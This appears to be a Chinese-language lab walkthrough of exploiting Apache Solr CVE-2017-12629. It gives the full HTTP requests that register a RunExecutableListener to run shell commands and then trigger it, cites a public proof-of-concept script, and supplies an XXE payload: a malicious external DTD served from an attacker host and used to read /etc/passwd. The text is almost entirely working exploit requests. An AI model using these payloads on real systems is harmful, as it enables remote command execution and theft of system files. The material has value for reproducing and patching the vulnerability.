solr(CVE-2017-12629)远程命令执行
作者:互联网
影响版本Apache Solr 5.5.0到7.0.1版本
solr(CVE-2017-12629-RCE)
环境搭建
1.burp检测
创建listen
POST /solr/demo/config HTTP/1.1
Host: 192.168.121.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
进行update操作,触发刚才添加的listener
POST /solr/demo/update HTTP/1.1
Host: 192.168.121.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15
[{"id":"test"}]
进入容器,可见/tmp/success已成功创建
2.脚本检测
poc地址
https://github.com/mark-zh/POC-AND-EXP/tree/master/Web%20Server/Apache
python 1.py http://192.168.121.129:8983/ id
solr(CVE-2017-12629-XXE)
另外一台kali搭建服务器
python -m SimpleHTTPServer
并在服务器下创建文件do.dtd
<!ENTITY %fileSYSTEM"file:///etc/passwd">
<!ENTITY % ent"<!ENTITY data SYSTEM ':%file;'>">
抓包
GET /solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f192.168.244.128:8000%2fdo.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser HTTP/1.1
标签:5.0,CVE,Accept,3E%,192.168,8983,2017,12629,solr 来源: https://www.cnblogs.com/bingtang123/p/14464154.html